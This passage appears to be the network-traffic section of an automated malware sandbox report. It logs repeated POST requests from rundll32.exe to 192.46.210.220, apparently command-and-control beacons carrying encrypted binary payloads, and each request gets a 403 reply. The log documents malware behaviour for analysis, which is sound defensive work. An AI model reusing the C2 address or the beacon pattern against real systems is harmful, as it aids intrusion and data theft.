                                                                                                        2021-10-28 02:52:36 UTC248OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:36 UTC253INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.549987192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:39 UTC253OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:39 UTC253OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:40 UTC263INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.549988192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:40 UTC258OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:40 UTC258OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:40 UTC263INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.549995192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:44 UTC263OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:44 UTC263OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:45 UTC273INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.549996192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:44 UTC268OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:44 UTC268OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:45 UTC273INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.550003192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:48 UTC273OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:48 UTC273OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:49 UTC283INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.550004192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:48 UTC278OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:48 UTC278OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:49 UTC283INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.550012192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:52 UTC283OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:52 UTC283OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:52 UTC293INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.550011192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:52 UTC288OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:52 UTC288OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:52 UTC293INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.550019192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:55 UTC293OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:55 UTC293OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:56 UTC302INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:56 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.549774192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:09 UTC29OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:09 UTC29OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:10 UTC34INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:10 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        60192.168.2.550020192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:56 UTC298OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:56 UTC298OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:56 UTC303INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:56 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        61192.168.2.550027192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:59 UTC303OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:59 UTC303OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:00 UTC312INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        62192.168.2.550028192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:59 UTC308OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
